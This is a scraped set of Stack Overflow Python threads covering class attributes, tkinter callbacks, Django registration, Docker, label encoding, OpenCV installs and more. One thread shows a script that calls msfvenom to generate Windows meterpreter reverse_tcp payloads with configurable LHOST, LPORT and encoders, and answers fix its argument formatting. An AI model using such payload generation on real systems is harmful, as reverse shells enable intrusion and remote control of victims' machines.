<p>It's class attributes vs instance attributes vs dynamic attributes. When you do:</p> <pre><code>class Car(): def __init__(self): pass c = Car() c.speed = 3 c.time = 5 </code></pre> <p><code>speed</code> and <code>time</code> are dynamic attributes <em>(not sure if this is an official term)</em>. If the <em>usage</em> of the class is such that these attributes are set before calling any other methods of <code>Car</code>, then those methods can use <code>self.speed</code>. Otherwise, you get an error:</p> <pre><code>&gt;&gt;&gt; d = Car() &gt;&gt;&gt; d.speed Traceback (most recent call last): File "&lt;stdin&gt;", line 1, in &lt;module&gt; AttributeError: 'Car' object has no attribute 'speed' &gt;&gt;&gt; </code></pre> <p>This happens because for <code>c</code>, speed and time are attributes on that instance of <code>Car</code>. Their existence or value doesn't propagate across other instances of Car. So when I create <code>d</code> and then try to lookup <code>d.speed</code>, the attribute doesn't exist. As you've said in your own comment, <em>"they spring into existence when they are first assigned to."</em></p> <blockquote> <p>I accidentally found that I don't have to init attributes in init. I learn from every tutor I have to put assignment in init like below.</p> </blockquote> <p>Your tutors were very wrong or you misunderstood what they meant. In the example you gave, every Car gets the same initial <code>speed</code> and <code>time</code>. Typically, an <code>__init__</code> would look like this:</p> <pre><code>class Car(): def __init__(self, speed, time): # notice that speed and time are # passed as arguments to init self.speed = speed self.time = time </code></pre> <p>You can then initialise a <code>Car</code> with: <code>c = Car(3, 5)</code>. Or put default values in init if it's optional.</p> <p>Edit: example adapted <a href="https://docs.python.org/3/tutorial/classes.html#class-and-instance-variables" rel="nofollow">from the docs</a>:</p> <pre><code>class Dog: kind = 'canine' # class variable shared by all instances def __init__(self, name): self.name = name # instance variable unique to each instance &gt;&gt;&gt; d = Dog('Fido') &gt;&gt;&gt; e = Dog('Buddy') &gt;&gt;&gt; d.kind # shared by all dogs 'canine' &gt;&gt;&gt; e.kind # shared by all dogs 'canine' &gt;&gt;&gt; d.name # unique to d 'Fido' &gt;&gt;&gt; e.name # unique to e 'Buddy' &gt;&gt;&gt; d.age = 3 # dynamic attribute/variable, unique to d &gt;&gt;&gt; d.age 3 &gt;&gt;&gt; e.age # e doesn't have it at all Traceback (most recent call last): File "&lt;stdin&gt;", line 1, in &lt;module&gt; AttributeError: 'Dog' object has no attribute 'age' </code></pre>
2
2016-08-02T06:38:04Z
[ "python", "class", "variable-assignment" ]
Appending variables as strings when passing command line arguments in python 2.7.12
38,710,788
<p>I am attempting to create a Metasploit payload generator with Python 2.7.12. It generates many malicious payloads utilizing <code>msfvenom</code>. </p> <p>First I utilize the <code>%s</code> and <code>%d</code> format operators.</p> <pre><code>call(["msfvenom", "-p", "windows/meterpreter/reverse_tcp", "LHOST=%s", "LPORT=%s", "-e %s", "-i %d", "-f %s", "&gt; %s.%s"]) % (str(lhost), str(lport), str(encode), iteration, str(formatop), str(payname), str(formatop)) </code></pre> <p>This error returns</p> <pre><code>/usr/bin/msfvenom:168:in `parse_args': invalid argument: -i %d (OptionParser::InvalidArgument) from /usr/bin/msfvenom:283:in `&lt;main&gt;' Traceback (most recent call last): File "menu.py", line 74, in &lt;module&gt; call(["msfvenom", "-p", "windows/meterpreter/reverse_tcp", "LHOST=%s", "LPORT=%s", "-e %s", "-i %d", "-f %s", "&gt; %s.%s"]) % (str(lhost), str(lport), str(encode), iteration, str(formatop), str(payname), str(formatop)) TypeError: unsupported operand type(s) for %: 'int' and 'str' </code></pre> <p>I am able to understand that msfvenom is not able to parse the argument I pass, which was the iteration flag, <code>-i</code>. Following that I see an error from Python, <code>TypeError</code>.</p> <p>After conducting some research, I decided to use <code>.format()</code>, since </p> <pre><code>call(["msfvenom", "-p", "windows/meterpreter/reverse_tcp", "LHOST={0}", "LPORT={1}", "-e {2}", "-i {3}", "-f {4}", "&gt; {5}.{6}"]).format(lhost, lport, encode, iteration, formatop, payname, formatop) </code></pre> <p>It returns</p> <pre><code>AttributeError: 'int' object has no attribute 'format' </code></pre> <p>What should I do? Also are there anyways I can optimize my program and instead of copy and pasting the same line, and changing the payload type for 15 options? </p>
1
2016-08-02T02:14:23Z
38,710,918
<p>A good trick is to use <code>split</code> on your command to create the list that's passed to <code>call</code>, this will make the the variable substitution cleaner too:</p> <pre><code>call("msfvenom -p windows/meterpreter/reverse_tcp LHOST={0} LPORT={1} -e {2} -i {3} -f {4} &gt; {5}.{6}" .split().format(lhost, lport, encode, iteration, formatop, payname, formatop)) </code></pre>
-1
2016-08-02T02:32:57Z
[ "python" ]
Appending variables as strings when passing command line arguments in python 2.7.12
38,710,788
<p>I am attempting to create a Metasploit payload generator with Python 2.7.12. It generates many malicious payloads utilizing <code>msfvenom</code>. </p> <p>First I utilize the <code>%s</code> and <code>%d</code> format operators.</p> <pre><code>call(["msfvenom", "-p", "windows/meterpreter/reverse_tcp", "LHOST=%s", "LPORT=%s", "-e %s", "-i %d", "-f %s", "&gt; %s.%s"]) % (str(lhost), str(lport), str(encode), iteration, str(formatop), str(payname), str(formatop)) </code></pre> <p>This error returns</p> <pre><code>/usr/bin/msfvenom:168:in `parse_args': invalid argument: -i %d (OptionParser::InvalidArgument) from /usr/bin/msfvenom:283:in `&lt;main&gt;' Traceback (most recent call last): File "menu.py", line 74, in &lt;module&gt; call(["msfvenom", "-p", "windows/meterpreter/reverse_tcp", "LHOST=%s", "LPORT=%s", "-e %s", "-i %d", "-f %s", "&gt; %s.%s"]) % (str(lhost), str(lport), str(encode), iteration, str(formatop), str(payname), str(formatop)) TypeError: unsupported operand type(s) for %: 'int' and 'str' </code></pre> <p>I am able to understand that msfvenom is not able to parse the argument I pass, which was the iteration flag, <code>-i</code>. Following that I see an error from Python, <code>TypeError</code>.</p> <p>After conducting some research, I decided to use <code>.format()</code>, since </p> <pre><code>call(["msfvenom", "-p", "windows/meterpreter/reverse_tcp", "LHOST={0}", "LPORT={1}", "-e {2}", "-i {3}", "-f {4}", "&gt; {5}.{6}"]).format(lhost, lport, encode, iteration, formatop, payname, formatop) </code></pre> <p>It returns</p> <pre><code>AttributeError: 'int' object has no attribute 'format' </code></pre> <p>What should I do? Also are there anyways I can optimize my program and instead of copy and pasting the same line, and changing the payload type for 15 options? </p>
1
2016-08-02T02:14:23Z
38,711,005
<p>You cannot use <code>format</code> on the result of the <code>call(...)</code>. You should format each component:</p> <pre><code>with open("{}.{}".format(payname, format), 'w') as outfile: call(["msfvenom", "-p", "windows/meterpreter/reverse_tcp", "LHOST={}".format(lhost), "LPORT={}".format(lport), "-e", str(encode), "-i", str(iteration), "-f", str(format)], stdout=outfile) </code></pre> <p>Note that the redirection is replaced with an explicitly opened file, because <code>subprocess.call</code> will not pass that to the shell unless you enable the unsafe <code>shell=True</code> argument.</p> <p>To repeat this multiple times with a different payload is easy: create an array with the payloads then put this code into a loop (or, perhaps clearer, a function called with one payload at a time).</p>
0
2016-08-02T02:43:26Z
[ "python" ]
Python 3 -- using kwargs with an args only module
38,710,801
<p>I am writing a gui in tkinter and using a publish/subscribe module (pyPubSub) to inform different parts of the program of what is occurring if they're subscribed. So, I have two functions that I need to work together. From tkinter, I'm using:</p> <pre><code>after_idle(callback, *args) </code></pre> <p>to call the message sending within the mainloop. As you can see, it only accepts *args for the arguments to send to the callback. The callback I'm sending is from pyPubSub:</p> <pre><code>sendMessage(topic, **kwargs) </code></pre> <p>So, I end up with this:</p> <pre><code>root.after_idle(pub.sendMessage, ?) </code></pre> <p>My question is, how do I make args work with kwargs? I have to call after_idle with positional arguments to send with the callback, but the callback requires keyword arguments only.</p>
0
2016-08-02T02:15:37Z
38,710,929
<p>You could always use <code>lambda</code>, here's a short example that does nothing.</p> <pre><code>import tkinter as tk def test(arg1, arg2): print(arg1, arg2) root = tk.Tk() root.after_idle(lambda: test(arg1=1, arg2=2)) root.mainloop() </code></pre>
3
2016-08-02T02:33:42Z
[ "python", "python-3.x", "tkinter", "arguments", "publish-subscribe" ]
Django Registration Redux Custom View
38,710,806
<p>(Django 1.8, Django-Registration-Redux 1.4)</p> <p>After following the answer in this SO post: <a href="http://stackoverflow.com/questions/29620940/django-registration-redux-add-extra-field">django-registration-redux add extra field</a></p> <p>I've implemented a custom view with my own template to register a user, and my custom form is correctly rendered.</p> <p>user_views.py</p> <pre><code>class SignupView(RegistrationView): form_class = MyRegistrationForm def register(self, request, form): print form print request new_user = super(SignupView, self).register(request, form) my_user_model = MyUserModel() my_user_model.user = new_user my_user_model.save() return new_user </code></pre> <p>However, register doesn't seem to get called. But, when I define post() - the request comes through with all of the form data. </p> <p>urls.py</p> <pre><code>url( r'^accounts/register/', user_views.SignupView.as_view(), name='signup' ), # Customized-Register url( r'^accounts/', include('registration.backends.default.urls') ), # Registration-Redux </code></pre> <p>Would appreciate guidance on the correct usage, thanks!</p>
0
2016-08-02T02:16:08Z
38,725,172
<p>Ok - I've determined the solution. It had to do with my custom form not collecting the (required) username field.</p> <p>Incase it helps, I figured it out by implementing form_invalid(self, form) as RegistrationView is a derived class of Django's FormView, which hinted me towards it. </p> <p>This SO answer helped override the username requirement: <a href="http://stackoverflow.com/questions/31356535/django-registration-redux-how-to-change-the-unique-identifier-from-username-to">Django Registration Redux: how to change the unique identifier from username to email and use email as login</a></p> <p>Hope it helps</p>
0
2016-08-02T15:51:17Z
[ "python", "django", "django-registration" ]
How can a few small Python scripts be run periodically with Docker?
38,710,923
<p>I currently have a handful of small Python scripts on my laptop that are set to run every 1-15 minutes, depending on the script in question. They perform various tasks for me like checking for new data on a certain API, manipulating it, and then posting it to another service, etc.</p> <p>I have a NAS/personal server (unRAID) and was thinking about moving the scripts to there via Docker, but since I'm relatively new to Docker I wasn't sure about the best approach.</p> <p>Would it be correct to take something like the <a href="https://github.com/phusion/baseimage-docker" rel="nofollow">Phusion Baseimage</a> which includes Cron, package my scripts and crontab as dependencies to the image, and write the Dockerfile to initialize all of this? Or would it be a more canonical approach to modify the scripts so that they are threaded with recursive timers and just run each script individually in it's own <a href="https://hub.docker.com/_/python/" rel="nofollow">official Python image</a>?</p>
0
2016-08-02T02:33:22Z
38,720,038
<p>No dude just install python on the docker container/image, move your scripts and run them as normal. You may have to expose some port or add firewall exception but your container can be as native linux environment.</p>
0
2016-08-02T12:08:59Z
[ "python", "docker", "dockerfile" ]
trigamma and digamma functions for bigfloat variable in python
38,710,962
<p>I need to compute the <code>scipy.special</code> trigamma and digamma functions of a variable with type <em>bigfloat</em> in python but I get the following error message:</p> <pre><code>TypeError: ufunc 'psi' not supported for the input types, and the inputs could not be safely coerced to any supported types according to the casting rule 'safe' </code></pre> <p>I need to keep my variables as bigfloat for precision purposes. Does any body know how I can compute digamma and trigamma functions for such variables? Thanks.</p>
0
2016-08-02T02:38:08Z
38,711,958
<p>Multiple precision implementations of digamma are available in <a href="https://pypi.python.org/pypi/gmpy2" rel="nofollow">gmpy2</a>, <a href="https://pypi.python.org/pypi/mpmath/0.19" rel="nofollow">mpmath</a>, and <a href="http://fredrikj.net/python-flint/index.html" rel="nofollow">Python-FLINT</a>. I am not aware of any implementations of trigamma.</p> <p>Disclaimer: I maintain <code>gmpy2</code>.</p>
1
2016-08-02T04:47:50Z
[ "python", "derivative", "gamma-function", "bigfloat" ]
How do you parse this JSON in Python?
38,710,971
<p>JSON below</p> <pre><code>{"result":[ { "spawn_point_id":"89", "encounter_id":"1421", "expiration_timestamp_ms":"1470105387836", "latitude":38.22, "longitude": -91.27 }, { "distance_in_meters":10, "encounter_id":"9677" }, { "distance_in_meters":10, "encounter_id":"1421" }, { "spawn_point_id":"11", "encounter_id":"2142", "expiration_timestamp_ms":"1470105387444", "latitude":38.00, "longitude": -91.00 } ]} </code></pre> <p>and i want the output to look like</p> <pre><code>spawn 89 at lat 38.22 long -91.27 spawn 11 at lat 38.00 long -91.00 </code></pre> <p>i used <code>json.loads</code> and it actually makes the json look funky. </p> <p>Code so far below:</p> <pre><code>c = json.loads(r.content) for d in c['result']: if d['latitude'] is not None: print(str(d['latitude'])) </code></pre> <p>seems to kind of work but then get error</p> <pre><code>Traceback (most recent call last): File "fast0.py", line 11, in &lt;module&gt; if d['latitude'] is not None: KeyError: 'latitude' </code></pre>
-6
2016-08-02T02:38:43Z
38,711,232
<p>You are looking for a key that does not exist. Try:</p> <pre><code>c = json.loads(r.content) for d in c['result']: if 'latitude' in d: print(str(d['latitude'])) </code></pre>
0
2016-08-02T03:17:41Z
[ "python", "json" ]
Encoding data's label for text classification
38,710,993
<p>I am doing a project in clinical text classification. In my corpus ,data are already labelled by code (For examples: 768.2, V13.02, V13.09, 599.0 ...). I already separated text and labels then using word-embedded for text. I am going to feed them into convolution neural network. However, the labels are needs to encode, I read examples of sentiment text classification and mnist but they all used integers to classify their data, my label in text form that why I cannot use one-hot encoding like them. Could anyone suggest any way to do it ? Thanks </p>
0
2016-08-02T02:41:50Z
38,711,955
<p>Discrete text label is easily convertible to discrete numeric data by creating an enumeration mapping. For example, assuming the labels "Yes", "No" and "Maybe":</p> <pre><code>No -&gt; 0 Yes -&gt; 1 Maybe -&gt; 2 </code></pre> <p>And now you have numeric data, which can later be converted back (as long as the algorithm treat those as discrete values and do not return 0.5 or something like that).</p> <p>In the case each instance can have multiples labels, as you said in a comment, you can create the encoding by putting each label in a column ("one-hot encoding"). Even if some software do not implement that off-the-shelf, it is not hard to do by hand.</p> <p>Here's a very simple (and not well-written to be honest) example using Panda's get_dummies function:</p> <pre><code>import numpy as np import pandas as pd labels = np.array(['a', 'b', 'a', 'c', 'ab', 'a', 'ac']) df = pd.DataFrame(labels, columns=['label']) ndf = pd.get_dummies(df) ndf.label_a = ndf.label_a + ndf.label_ab + ndf.label_ac ndf.label_b = ndf.label_b + ndf.label_ab ndf.label_c = ndf.label_c + ndf.label_ac ndf = ndf.drop(['label_ab', 'label_ac'], axis=1) ndf label_a label_b label_c 0 1.0 0.0 0.0 1 0.0 1.0 0.0 2 1.0 0.0 0.0 3 0.0 0.0 1.0 4 1.0 1.0 0.0 5 1.0 0.0 0.0 6 1.0 0.0 1.0 </code></pre> <p>You can now train a multivariate model to output the values of <code>label_a</code>, <code>label_b</code> and <code>label_c</code> and then reconstruct the original labels like "ab". Just make sure the output is in the set [0, 1] (by applying softmax-layer or something like that).</p>
1
2016-08-02T04:47:39Z
[ "python", "encoding", "tensorflow", "text-classification" ]
Encoding data's label for text classification
38,710,993
<p>I am doing a project in clinical text classification. In my corpus ,data are already labelled by code (For examples: 768.2, V13.02, V13.09, 599.0 ...). I already separated text and labels then using word-embedded for text. I am going to feed them into convolution neural network. However, the labels are needs to encode, I read examples of sentiment text classification and mnist but they all used integers to classify their data, my label in text form that why I cannot use one-hot encoding like them. Could anyone suggest any way to do it ? Thanks </p>
0
2016-08-02T02:41:50Z
38,713,767
<p>Watch this 4 mins video (Corsera: ML classification (University of Washington)-> Week1 -> Encoding Categorical Inputs) <a href="https://www.coursera.org/learn/ml-classification/lecture/kCY0D/encoding-categorical-inputs" rel="nofollow">https://www.coursera.org/learn/ml-classification/lecture/kCY0D/encoding-categorical-inputs</a></p> <p>There are two methods of encoding:</p> <ol> <li><p>One Hot Encoding</p></li> <li><p>Bag of words (I think this is more suitable method in this case)</p></li> </ol> <p>Following diagram describes how bag of words method works. Text can have say 10,000 different words that come from it, or more, many more, millions. And so what Bag of Words does is take that text, and then codes its as counts. </p> <p><a href="http://i.stack.imgur.com/Nwz6o.png" rel="nofollow"><img src="http://i.stack.imgur.com/Nwz6o.png" alt="enter image description here"></a></p> <p>Edit 1</p> <p><strong>Python Implementation:</strong> Visit <a href="http://www.python-course.eu/text_classification_python.php" rel="nofollow">http://www.python-course.eu/text_classification_python.php</a> </p>
1
2016-08-02T07:03:50Z
[ "python", "encoding", "tensorflow", "text-classification" ]
Flask Admin editing columns send requests
38,710,997
<p>I am using flask-admin with ModelViews</p> <pre><code>class MyModel(ModelView): can_create = False can_edit = True column_list = ['column'] </code></pre> <p>This allows me to edit the data on each row. However I want to perform some custom function in addition to the editing. I tried to add a route for the edit but it overrides the existing functionality.</p> <pre><code>@app.route('/admin/mymodelview/edit/', methods=['POST']) def do_something_in_addition(): ... </code></pre> <p>Is there any way to extend the existing edit functionality?</p>
0
2016-08-02T02:42:06Z
38,717,857
<p>Override either the <a href="https://flask-admin.readthedocs.io/en/latest/api/mod_model/#flask_admin.model.BaseModelView.after_model_change" rel="nofollow">after_model_change</a> method or the <a href="https://flask-admin.readthedocs.io/en/latest/api/mod_model/#flask_admin.model.BaseModelView.on_model_change" rel="nofollow">on_model_change</a> methods in your view class. </p> <p>For example :</p> <pre><code>class MyModel(ModelView): can_create = False can_edit = True column_list = ['column'] def after_model_change(self, form, model, is_created): # model has already been commited here # do custom work pass def on_model_change(self, form, model, is_created) # model has not been commited yet so can be changed # do custom work that can affect the model pass </code></pre>
1
2016-08-02T10:24:56Z
[ "python", "database", "flask-admin" ]
Opencv3: Error when import cv2 in python OSX el capital
38,711,098
<p>I was installed OpenCV 3.1 on mac OSX, I also create a symlink in </p> <pre><code>/Library/Python/2.7/site-packages: cv2.so -&gt; /usr/local/Cellar/opencv3/3.1.0_3/lib/python2.7/site-packages/cv2.so </code></pre> <p>But when I import cv2 in terminal i got this error:</p> <pre><code>&gt;&gt;&gt; import cv2 Traceback (most recent call last): File "&lt;stdin&gt;", line 1, in &lt;module&gt; ImportError: dlopen(/Library/Python/2.7/site-packages/cv2.so, 2): Library not loaded: /usr/local/opt/webp/lib/libwebp.6.dylib Referenced from: /usr/local/Cellar/opencv3/3.1.0_3/lib/libopencv_imgcodecs.3.1.dylib Reason: image not found </code></pre> <p>Then I tried to install webp using mac port:</p> <pre><code>sudo port install webp </code></pre> <p>But after that i still got the error above when import cv2 in python:</p> <pre><code>ImportError: dlopen(/Library/Python/2.7/site-packages/cv2.so, 2): Library not loaded: /usr/local/opt/webp/lib/libwebp.6.dylib </code></pre> <p>Any help would be appreciated.</p>
2
2016-08-02T02:56:34Z
38,738,295
<p>I found the solution in <a href="https://developers.google.com/speed/webp/docs/compiling#building" rel="nofollow">here</a>. Installed webp using macports not solve the problem, I have to install webp follow this step:</p> <ul> <li>Download libwebp-0.5.1.tar.gz (not libwebp-0.5.1-mac-10.9.tar.gz) from <a href="https://storage.googleapis.com/downloads.webmproject.org/releases/webp/index.html" rel="nofollow">here</a></li> <li>Untar the package:</li> </ul> <p><code>tar xvzf libwebp-0.5.1.tar.gz</code></p> <ul> <li><p>Go to the directory where libwebp-0.5.1/ was extracted to and run the following commands:</p> <p>cd libwebp-0.5.1</p> <p>./configure</p> <p>make</p> <p>sudo make install</p></li> </ul> <p>That's work for me.</p>
0
2016-08-03T08:26:39Z
[ "python", "osx", "python-2.7", "opencv", "opencv3.1" ]
Opencv3: Error when import cv2 in python OSX el capital
38,711,098
<p>I was installed OpenCV 3.1 on mac OSX, I also create a symlink in </p> <pre><code>/Library/Python/2.7/site-packages: cv2.so -&gt; /usr/local/Cellar/opencv3/3.1.0_3/lib/python2.7/site-packages/cv2.so </code></pre> <p>But when I import cv2 in terminal i got this error:</p> <pre><code>&gt;&gt;&gt; import cv2 Traceback (most recent call last): File "&lt;stdin&gt;", line 1, in &lt;module&gt; ImportError: dlopen(/Library/Python/2.7/site-packages/cv2.so, 2): Library not loaded: /usr/local/opt/webp/lib/libwebp.6.dylib Referenced from: /usr/local/Cellar/opencv3/3.1.0_3/lib/libopencv_imgcodecs.3.1.dylib Reason: image not found </code></pre> <p>Then I tried to install webp using mac port:</p> <pre><code>sudo port install webp </code></pre> <p>But after that i still got the error above when import cv2 in python:</p> <pre><code>ImportError: dlopen(/Library/Python/2.7/site-packages/cv2.so, 2): Library not loaded: /usr/local/opt/webp/lib/libwebp.6.dylib </code></pre> <p>Any help would be appreciated.</p>
2
2016-08-02T02:56:34Z
39,401,123
<p>I had the same issue, and after run <code>brew install webp</code> it simply fixed the import issue on python.</p> <p>I hope this help you.</p>
2
2016-09-08T22:29:30Z
[ "python", "osx", "python-2.7", "opencv", "opencv3.1" ]
Why pandas apply much slower than dataframe merge
38,711,147
<p>From my <a href="http://stackoverflow.com/questions/38697404/pandas-explanation-on-apply-function-being-slow/38708239?noredirect=1#comment64799081_38708239">previous question</a>, I know apply is much slower than dataframe merge directly.</p> <p>But I am still confused about why that much slower, as in my understanding, if there are N rows in dataframe, apply function should work as O(N)...</p> <p>Could anyone explain the theory behind apply and dataframe merge to me? Or is there any resources to study that?</p> <p>Thanks in advance :)</p>
1
2016-08-02T03:05:05Z
38,711,326
<p>The answer is <strong>yes</strong>. Python can be hundreds of times slower than C, just because it's Python, with equivalent asymptotics. As an applied mathematician with lots of number crunching experience, I can testify that C can be tens to hundreds of times faster than Python. See <a href="https://benchmarksgame.alioth.debian.org/u64q/compare.php?lang=python3&amp;lang2=gpp" rel="nofollow"> these benchmarks</a> for an official source. </p> <p>Remember that asymptotic complexity is about <strong>scaling only</strong>. Two algorithms can easily have the same complexity and yet differ in runtime by orders of magnitude. Now, if you find that Python is slowing down <strong>by a greater factor</strong> than C is, (that is doubling the input more than doubles the runtime when it's supposed to be linear), you could be dealing with an asymptotically significant algorithmic difference.</p>
1
2016-08-02T03:28:40Z
[ "python", "pandas" ]
Installation: Reportlab: "ImportError: No module named reportlab.lib"
38,711,221
<p>I've installed reportlab, via</p> <pre><code>pip install reportlab </code></pre> <p>(also tried via</p> <pre><code>easy_install reportlab </code></pre> <p>)</p> <p>..but I get the above error. There are other RL imports before that - it's the .lib that it's objecting to. I've had RL working great in the past, but IT reimaged my computer, and I'm trying to rebuild it. The script works fine, but there's something funky with the RL install, I think.</p> <p>Reportlab: 3.3.0</p>
1
2016-08-02T03:15:11Z
38,769,487
<p>Most of the times errors like this are caused by an broken package, either in the package it self or in one of it's dependencies. </p> <p>The best way to resolve such a issue is to force-reinstall the package, it will reinstall the package and its dependencies potentially repairing the package. </p> <p>To force-reinstall <code>reportlab</code> use:</p> <pre><code>pip install --upgrade --force-reinstall reportlab </code></pre>
0
2016-08-04T13:59:10Z
[ "python", "installation", "pip", "reportlab" ]
updating specific numpy matrix columns
38,711,248
<p>I have the following list of indices <code>[2 4 3 4]</code> which correspond to my target indices. I'm creating a matrix of zeroes with the following line of code <code>targets = np.zeros((features.shape[0], 5))</code>. Im wondering if its possible to slice in such a way that I could update the specific indices all at once and set those values to 1 without a for loop, ideally the matrix would look like<br> <code>([0,0,1,0,0], [0,0,0,0,1], [0,0,0,1,0], [0,0,0,0,1])</code></p>
3
2016-08-02T03:19:47Z
38,711,497
<p>I believe you can do something like this:</p> <pre><code>targets = np.zeros((4, 5)) ind = [2, 4, 3, 4] targets[np.arange(0, 4), ind] = 1 </code></pre> <p>Here is the result:</p> <pre><code>array([[ 0., 0., 1., 0., 0.], [ 0., 0., 0., 0., 1.], [ 0., 0., 0., 1., 0.], [ 0., 0., 0., 0., 1.]]) </code></pre>
4
2016-08-02T03:53:10Z
[ "python", "numpy" ]
Create a tree from multiple nested dictionaries/lists in Python
38,711,365
<p><strong>Preface</strong>: To help explain <strong>why</strong> I am doing this, I will explain the end goal. Essentially I have a list of <em>accounts</em> that are defined in a very specific syntax. Here are some examples:</p> <pre><code>Assets:Bank:Car Assets:Bank:House Assets:Savings:Emergency Assets:Savings:Goals:Roof Assets:Reserved </code></pre> <p>As can be seen above, an account can have any number of parents and children. The end goal is to parse the above accounts into a tree structure in Python that will be used for providing account auto-completion in the Sublime Text Editor (i.e, if I typed <em>Assets:</em> and then queried for auto-complete, I would be presented with a list as such: <em>Bank, Savings, Reserved</em>)</p> <p><strong>The Result:</strong> Using the account list from the preface, the desired result in Python would look something like below:</p> <pre><code>[ { "Assets":[ { "Bank":[ "Car", "House" ] }, { "Savings":[ "Emergency", { "Goals":[ "Roof" ] } ] }, "Reserved" ] } ] </code></pre> <p><strong>Half-Solution:</strong> I was able to get two basic accounts to get added together using recursion. This works for adding these two: <code>Assets:Bank:Car</code> and <code>Assets:Bank:House</code>. However, once they start to differ it starts to fall apart and the recursion gets messy, so I'm not sure if it's the best way.</p> <pre><code>import re def parse_account(account_str): subs = account_str.split(":") def separate(subs): if len(subs) == 1: return subs elif len(subs): return [{subs[0]: separate(subs[1:])}] return separate(subs) def merge_dicts(a, b): # a will be a list with dictionaries and text values and then nested lists/dictionaries/text values # b will always be a list with ONE dictionary or text value key = b[0].keys()[0] # this is the dictionary key of the only dictionary in the b list for item in a: # item is a dictionary or a text value if isinstance(item, dict): # if item is a dictionary if key in item: # Is the value a list with a dict or a list with a text value if isinstance(b[0][key][0], str): # Extend the current list with the new value item[key].extend(b[0][key]) else: # Recurse to the next child merge_dicts(item[key], b[0][key]) else: return a # Accounts have an "open [name]" syntax for defining them text = "open Assets:Bank:Car\nopen Assets:Bank:House\nopen Assets:Savings:Emergency\nopen Assets:Savings:Goals:Roof\nopen Assets:Reserved" EXP = re.compile("open (.*)") accounts = EXP.findall(text) # This grabs all accounts # Create a list of all the parsed accounts dicts = [] for account in accounts: dicts.append(parse_account(account)) # Attempt to merge two accounts together final = merge_dicts(dicts[0], dicts[1]) print final # In the future we would call: reduce(merge_dicts, dicts) to merge all accounts </code></pre> <p>I could be going about this in the completely wrong way and I would be interested in differing opinions. Otherwise, does anyone have insight into how to make this work with the remaining accounts in the example string?</p>
0
2016-08-02T03:36:18Z
38,712,931
<p>That took me ages to sort out in my head. The dictionaries are simple, one key which always has a list as a value - they're used to have a named list.</p> <p>Inside the lists will be a string, or another dictionary (with a key with a list).</p> <p>That means we can break up 'Assets:Bank:Car' and look for a dictionary in the root list matching <code>{"Assets":[&lt;whatever&gt;]}</code> or add one - and then jump to the <code>[&lt;whatever&gt;]</code> list two levels deeper. Next loop, look for a dictionary matching <code>{"Bank":[&lt;whatever&gt;]}</code>, or add one, jump to the <code>[&lt;whatever&gt;]</code> list two levels deeper. Keep doing that until we hit the last node <code>Car</code>. We must be on <em>a</em> list since we always jumped to an existing list or made a new one, so put <code>Car</code> in the current list.</p> <p>NB. this approach would break if you had</p> <pre><code>Assets:Reserved Assets:Reserved:Painting </code></pre> <p>but that would be a nonsense conflicting input, asking "Reserved" to be both leaf node and container, and in that situation you would only have:</p> <pre><code>Assets:Reserved:Painting </code></pre> <p>right?</p> <pre><code>data = """ Assets:Bank:Car Assets:Bank:House Assets:Savings:Emergency Assets:Savings:Goals:Roof Assets:Reserved """ J = [] for line in data.split('\n'): if not line: continue # split the line into parts, start at the root list # is there a dict here for this part? # yes? cool, dive into it for the next loop iteration # no? add one, with a list, ready for the next loop iteration # (unless we're at the final part, then stick it in the list # we made/found in the previous loop iteration) parts = line.split(':') parent_list, current_list = J, J for index, part in enumerate(parts): for item in current_list: if part in item: parent_list, current_list = current_list, item[part] break else: if index == len(parts) - 1: # leaf node, add part as string current_list.append(part) else: new_list = [] current_list.append({part:new_list}) parent_list, current_list = current_list, new_list print J </code></pre> <p>-></p> <pre><code>[{'Assets': [{'Bank': ['Car', 'House']}, {'Savings': ['Emergency', {'Goals': ['Roof']}]}, 'Reserved']}] </code></pre> <p>Try online: <a href="https://repl.it/Ci5L" rel="nofollow">https://repl.it/Ci5L</a></p>
1
2016-08-02T06:10:55Z
[ "python", "dictionary", "recursion", "tree", "nested" ]
Saving option value from Django to mongodb
38,711,457
<p>I'm new to Django. And recently am working on a website that need to show data from mongoDB and collect people's answers by offering forms. And now I got stuck with saving data from form to mongoDB. </p> <p>I want people to only choose one answer in the dropdown form. Here is the html:</p> <pre><code> &lt;table&gt; &lt;form action="/reply/" method="POST" &gt; &lt;td&gt; &lt;select name = "reply"&gt; &lt;option value="#"&gt;Choose&lt;/option&gt; &lt;option value="support"&gt;Support&lt;/option&gt; &lt;option value="against"&gt;Against&lt;/option&gt; &lt;option value="related"&gt;Related&lt;/option&gt; &lt;option value="irrelated"&gt;Irrelated&lt;/option&gt; &lt;/select&gt; &lt;input type="submit" value="OK!"&gt; &lt;/form&gt; &lt;/table&gt; </code></pre> <p>And here is my view</p> <pre><code>def labeling(request): form = request.POST if form.is_valid(): db.label.insert({ reply : form, Post_ID : reequest.GET['id'] }) db.label.update return HttpResponseRedirect("") </code></pre> <p>I have created collection named "label".</p> <p>I have been working on this problems for a long time...I'll appreciate if someone could help me...</p>
0
2016-08-02T03:47:40Z
38,713,369
<p>This may work for you :-</p> <p>Your views.py :- </p> <pre><code>def labeling(request): if request.method == 'POST': form = FormClassName(request.POST) if form.is_valid(): instance = form.save(commit=False) instance.reply = form.cleaned_data['reply'] instance.postId = form.cleaned_data['postId'] instance.save() data = {'success':True,'msg':'Store user data successfully'} return HttpResponse(json.dumps(data),content_type="application/json") else: data = {'success':False,'msg':'Not Store user data successfully'} return HttpResponse(json.dumps(data),content_type="application/json") </code></pre> <p>Your forms.py :-</p> <pre><code>class FormClassName(ModelForm): class Meta: model = modelName fields = [ "reply", "postId", ] </code></pre>
0
2016-08-02T06:40:48Z
[ "python", "django", "mongodb" ]
Python - Get the process id of an instance
38,711,472
<p>I'm trying to work with different processes in Python, and I am having some difficulty getting the PID of a particular instance.</p> <p>For example, I'm sending the mainCar instance in one class:</p> <pre><code>warehouse = Warehouse() mainCar = Car().start() warehouse.add(mainCar) </code></pre> <p>in the warehouse class, I'm reciving the mainCar variable and want to know its PID</p> <p>How do I get the process id using the mainCar variable? I would be passing this variable to a different class and the process ID of this variable would be different to what os.getpid() give me. </p> <p>Thanks in advance!</p>
0
2016-08-02T03:49:09Z
38,712,336
